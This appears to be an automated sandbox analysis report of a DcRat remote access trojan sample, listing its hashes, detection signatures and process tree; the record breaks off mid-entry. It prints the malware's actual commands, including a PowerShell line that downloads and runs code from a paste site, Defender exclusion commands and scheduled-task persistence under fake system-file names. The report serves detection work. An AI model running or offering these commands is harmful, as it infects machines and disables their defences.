dcrat | 688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028

Analysis

max time kernel
86s
max time network
87s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
08-01-2025 08:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

spreadmalware.exe
Size

61KB
MD5

3437a2105a9740ad94b06f04378bb5b9
SHA1

80ca4ebff21e3a4962ccdec2853308ba544cdeb9
SHA256

688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028
SHA512

5d30cc5fe4b59a99f8c188c9d9efeb22d4813bd1fed44b4cb6f4bc1d045d51a31591c40f41324fc0afd65e1b4630aa304f5e8d90009ec6f1c690c75313a74076
SSDEEP

1536:lF6AD4dXD7tlo9OlvBu/b2QDAOzJri76tF:qZdnty9ODu/b2Vexi7a

Score

10^/10

dcrat execution infostealer rat

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Process spawned unexpected child process 36 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3428	1200	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	348	1200	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3556	1200	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4092	1200	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4752	1200	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2940	1200	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	232	1200	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2984	1200	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3668	1200	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2764	1200	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	752	1200	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1872	1200	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3388	1200	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3960	1200	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4484	1200	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2076	1200	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5092	1200	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2676	1200	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2164	1200	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3112	1200	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2260	1200	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2388	1200	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3996	1200	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1664	1200	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1004	1200	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1136	1200	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4604	1200	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3236	1200	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2212	1200	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4164	1200	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4432	1200	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3508	1200	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4892	1200	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2392	1200	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	212	1200	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4608	1200	schtasks.exe	86

DCRat payload 1 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/memory/5020-3-0x000000001C390000-0x000000001C490000-memory.dmp	dcrat

Blocklisted process makes network request 6 IoCs

flow	pid	Process
17	1960	powershell.exe
23	1960	powershell.exe
24	1960	powershell.exe
37	4180	powershell.exe
38	4180	powershell.exe
39	4180	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
544	powershell.exe
1128	powershell.exe
1012	powershell.exe
4944	powershell.exe
4488	powershell.exe
4768	powershell.exe
4508	powershell.exe
3340	powershell.exe
868	powershell.exe
3048	powershell.exe
4456	powershell.exe
1224	powershell.exe
3344	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	spreadmalware.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	wininit.exe

Executes dropped EXE 1 IoCs

pid	Process
2400	wininit.exe

Drops file in Program Files directory 10 IoCs

description	ioc	Process
File created	C:\Program Files\Windows Defender\5b884080fd4f94	spreadmalware.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\de-DE\conhost.exe	spreadmalware.exe
File created	C:\Program Files (x86)\Internet Explorer\fr-FR\smss.exe	spreadmalware.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\csrss.exe	spreadmalware.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\886983d96e3d3e	spreadmalware.exe
File created	C:\Program Files (x86)\Common Files\Java\fontdrvhost.exe	spreadmalware.exe
File created	C:\Program Files (x86)\Common Files\Java\5b884080fd4f94	spreadmalware.exe
File created	C:\Program Files\Windows Defender\fontdrvhost.exe	spreadmalware.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\de-DE\088424020bedd6	spreadmalware.exe
File created	C:\Program Files (x86)\Internet Explorer\fr-FR\69ddcba757bf72	spreadmalware.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\Performance\lsass.exe	spreadmalware.exe
File created	C:\Windows\Performance\6203df4a6bafc7	spreadmalware.exe
File created	C:\Windows\Containers\serviced\csrss.exe	spreadmalware.exe
File created	C:\Windows\Containers\serviced\886983d96e3d3e	spreadmalware.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Scheduled Task/Job: Scheduled Task 1 TTPs 36 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
752	schtasks.exe
1872	schtasks.exe
4484	schtasks.exe
1004	schtasks.exe
4164	schtasks.exe
3508	schtasks.exe
3556	schtasks.exe
4092	schtasks.exe
4752	schtasks.exe
2940	schtasks.exe
2984	schtasks.exe
3388	schtasks.exe
2076	schtasks.exe
2260	schtasks.exe
2676	schtasks.exe
348	schtasks.exe
2764	schtasks.exe
2164	schtasks.exe
4892	schtasks.exe
1136	schtasks.exe
3236	schtasks.exe
2392	schtasks.exe
5092	schtasks.exe
2388	schtasks.exe
3996	schtasks.exe
4432	schtasks.exe
212	schtasks.exe
232	schtasks.exe
3668	schtasks.exe
3960	schtasks.exe
2212	schtasks.exe
3428	schtasks.exe
3112	schtasks.exe
1664	schtasks.exe
4604	schtasks.exe
4608	schtasks.exe

Suspicious behavior: EnumeratesProcesses 50 IoCs

pid	Process
5020	spreadmalware.exe
1960	powershell.exe
1960	powershell.exe
5020	spreadmalware.exe
5020	spreadmalware.exe
5020	spreadmalware.exe
5020	spreadmalware.exe
4508	powershell.exe
4508	powershell.exe
4488	powershell.exe
4488	powershell.exe
544	powershell.exe
544	powershell.exe
3344	powershell.exe
3344	powershell.exe
4456	powershell.exe
4456	powershell.exe
4768	powershell.exe
4768	powershell.exe
3340	powershell.exe
3340	powershell.exe
868	powershell.exe
868	powershell.exe
3048	powershell.exe
3048	powershell.exe
4944	powershell.exe
4944	powershell.exe
1224	powershell.exe
1224	powershell.exe
1012	powershell.exe
1012	powershell.exe
1128	powershell.exe
1128	powershell.exe
4944	powershell.exe
4508	powershell.exe
4508	powershell.exe
4488	powershell.exe
4456	powershell.exe
3340	powershell.exe
4768	powershell.exe
3048	powershell.exe
544	powershell.exe
1128	powershell.exe
868	powershell.exe
3344	powershell.exe
1224	powershell.exe
1012	powershell.exe
2400	wininit.exe
4180	powershell.exe
4180	powershell.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

description	pid	Process
Token: SeDebugPrivilege	5020	spreadmalware.exe
Token: SeDebugPrivilege	1960	powershell.exe
Token: SeDebugPrivilege	2400	wininit.exe
Token: SeDebugPrivilege	4508	powershell.exe
Token: SeDebugPrivilege	3048	powershell.exe
Token: SeDebugPrivilege	3344	powershell.exe
Token: SeDebugPrivilege	544	powershell.exe
Token: SeDebugPrivilege	4488	powershell.exe
Token: SeDebugPrivilege	4456	powershell.exe
Token: SeDebugPrivilege	4768	powershell.exe
Token: SeDebugPrivilege	3340	powershell.exe
Token: SeDebugPrivilege	1224	powershell.exe
Token: SeDebugPrivilege	868	powershell.exe
Token: SeDebugPrivilege	4944	powershell.exe
Token: SeDebugPrivilege	1012	powershell.exe
Token: SeDebugPrivilege	1128	powershell.exe
Token: SeDebugPrivilege	4180	powershell.exe

Suspicious use of WriteProcessMemory 52 IoCs

description	pid	Process	procid_target
PID 5020 wrote to memory of 4416	5020	spreadmalware.exe	83
PID 5020 wrote to memory of 4416	5020	spreadmalware.exe	83
PID 4416 wrote to memory of 1960	4416	cmd.exe	85
PID 4416 wrote to memory of 1960	4416	cmd.exe	85
PID 5020 wrote to memory of 4488	5020	spreadmalware.exe	124
PID 5020 wrote to memory of 4488	5020	spreadmalware.exe	124
PID 5020 wrote to memory of 4768	5020	spreadmalware.exe	125
PID 5020 wrote to memory of 4768	5020	spreadmalware.exe	125
PID 5020 wrote to memory of 3344	5020	spreadmalware.exe	126
PID 5020 wrote to memory of 3344	5020	spreadmalware.exe	126
PID 5020 wrote to memory of 544	5020	spreadmalware.exe	128
PID 5020 wrote to memory of 544	5020	spreadmalware.exe	128
PID 5020 wrote to memory of 4508	5020	spreadmalware.exe	129
PID 5020 wrote to memory of 4508	5020	spreadmalware.exe	129
PID 5020 wrote to memory of 3340	5020	spreadmalware.exe	131
PID 5020 wrote to memory of 3340	5020	spreadmalware.exe	131
PID 5020 wrote to memory of 1128	5020	spreadmalware.exe	132
PID 5020 wrote to memory of 1128	5020	spreadmalware.exe	132
PID 5020 wrote to memory of 1224	5020	spreadmalware.exe	133
PID 5020 wrote to memory of 1224	5020	spreadmalware.exe	133
PID 5020 wrote to memory of 4944	5020	spreadmalware.exe	135
PID 5020 wrote to memory of 4944	5020	spreadmalware.exe	135
PID 5020 wrote to memory of 1012	5020	spreadmalware.exe	136
PID 5020 wrote to memory of 1012	5020	spreadmalware.exe	136
PID 5020 wrote to memory of 3048	5020	spreadmalware.exe	138
PID 5020 wrote to memory of 3048	5020	spreadmalware.exe	138
PID 5020 wrote to memory of 868	5020	spreadmalware.exe	139
PID 5020 wrote to memory of 868	5020	spreadmalware.exe	139
PID 5020 wrote to memory of 4456	5020	spreadmalware.exe	141
PID 5020 wrote to memory of 4456	5020	spreadmalware.exe	141
PID 5020 wrote to memory of 2400	5020	spreadmalware.exe	150
PID 5020 wrote to memory of 2400	5020	spreadmalware.exe	150
PID 1960 wrote to memory of 2856	1960	powershell.exe	153
PID 1960 wrote to memory of 2856	1960	powershell.exe	153
PID 2856 wrote to memory of 4664	2856	cmd.exe	155
PID 2856 wrote to memory of 4664	2856	cmd.exe	155
PID 2856 wrote to memory of 3668	2856	cmd.exe	156
PID 2856 wrote to memory of 3668	2856	cmd.exe	156
PID 2856 wrote to memory of 2296	2856	cmd.exe	157
PID 2856 wrote to memory of 2296	2856	cmd.exe	157
PID 2400 wrote to memory of 2240	2400	wininit.exe	169
PID 2400 wrote to memory of 2240	2400	wininit.exe	169
PID 2240 wrote to memory of 4180	2240	cmd.exe	171
PID 2240 wrote to memory of 4180	2240	cmd.exe	171
PID 4180 wrote to memory of 4764	4180	powershell.exe	173
PID 4180 wrote to memory of 4764	4180	powershell.exe	173
PID 4764 wrote to memory of 3372	4764	cmd.exe	175
PID 4764 wrote to memory of 3372	4764	cmd.exe	175
PID 4764 wrote to memory of 1012	4764	cmd.exe	176
PID 4764 wrote to memory of 1012	4764	cmd.exe	176
PID 4764 wrote to memory of 4356	4764	cmd.exe	177
PID 4764 wrote to memory of 4356	4764	cmd.exe	177

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\spreadmalware.exe
"C:\Users\Admin\AppData\Local\Temp\spreadmalware.exe"
1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5020
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C powershell "iwr https://pastejustit.com/raw/msdcgy3bxg | iex"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4416
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell "iwr https://pastejustit.com/raw/msdcgy3bxg | iex"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1960
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\runtime.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2856
    - - C:\Windows\system32\findstr.exe
        
        findstr /i "echo" "C:\Users\Admin\AppData\Roaming\runtime.bat"
        5⤵
        
        PID:4664
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo \\DADDYSERVER "
        5⤵
        
        PID:3668
    - - C:\Windows\system32\findstr.exe
        
        findstr /i "DADDYSERVER"
        5⤵
        
        PID:2296
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\spreadmalware.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4488
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\sihost.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4768
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Music\fontdrvhost.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3344
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\fontdrvhost.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:544
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Photo Viewer\de-DE\conhost.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4508
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Performance\lsass.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3340
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Internet Explorer\fr-FR\smss.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1128
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\explorer.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1224
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office\root\Licenses16\csrss.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4944
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\wininit.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1012
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Containers\serviced\csrss.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3048
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Common Files\Java\fontdrvhost.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:868
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\lsass.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4456
- C:\Recovery\WindowsRE\wininit.exe
  "C:\Recovery\WindowsRE\wininit.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2400
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C powershell "iwr https://pastejustit.com/raw/msdcgy3bxg | iex"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2240
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell "iwr https://pastejustit.com/raw/msdcgy3bxg | iex"
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4180
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\runtime.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4764
      - C:\Windows\system32\findstr.exe
        
        findstr /i "echo" "C:\Users\Admin\AppData\Roaming\runtime.bat"
        6⤵
        
        PID:3372
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo \\DADDYSERVER "
        6⤵
        
        PID:1012
      - C:\Windows\system32\findstr.exe
        
        findstr /i "DADDYSERVER"
        6⤵
        
        PID:4356

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\sihost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3428

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:348

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3556

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Music\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4092

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\Public\Music\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4752

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Users\Public\Music\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2940

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Defender\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:232

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2984

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Defender\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3668

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Photo Viewer\de-DE\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2764

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\de-DE\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:752

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Photo Viewer\de-DE\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1872

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\Windows\Performance\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3388

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\Performance\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3960

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Windows\Performance\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4484

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Internet Explorer\fr-FR\smss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2076

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\fr-FR\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5092

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Internet Explorer\fr-FR\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2676

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2164

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3112

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2260

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Program Files\Microsoft Office\root\Licenses16\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2388

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\root\Licenses16\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3996

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Microsoft Office\root\Licenses16\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1664

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1004

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1136

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4604

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Windows\Containers\serviced\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3236

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\Containers\serviced\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2212

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Windows\Containers\serviced\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4164

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Common Files\Java\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4432

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Java\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3508

C:\Windows\system32\schtasks.exe
